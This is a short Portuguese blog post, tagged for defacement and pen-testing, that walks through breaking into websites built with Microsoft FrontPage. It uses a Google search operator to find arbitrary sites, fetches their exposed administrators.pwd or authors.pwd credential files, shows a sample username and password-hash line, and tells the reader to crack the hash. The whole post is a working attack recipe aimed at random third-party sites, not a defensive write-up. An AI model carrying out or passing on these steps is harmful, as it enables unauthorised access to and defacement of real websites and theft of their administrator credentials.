Explorando sites feitos no front page

1º primeiro abra o Google,

digite: inurl:_vti_pvt

isso localiza sites feitos em frontpage, pois o frontpage cria essas pastas.

2º Explorando a vulnerabilidade.

clique em um site da pesquisa feita por: inurl:_vti_pvt
e adicione ao final da url:

administrators.pwd OU authors.pwd

exemplo:
http://www.site/_vti_pvt/administrators.pwd

se der para explorar a vulnerabilidade aparecerá o usuário seguido da senha
ex:

# -FrontPage-
21stcapital:RzSXiKATauHFI

A senha virá criptografada, procure um decripter no google

Posted in: Defacer,Pen-Test,Vunerabilidade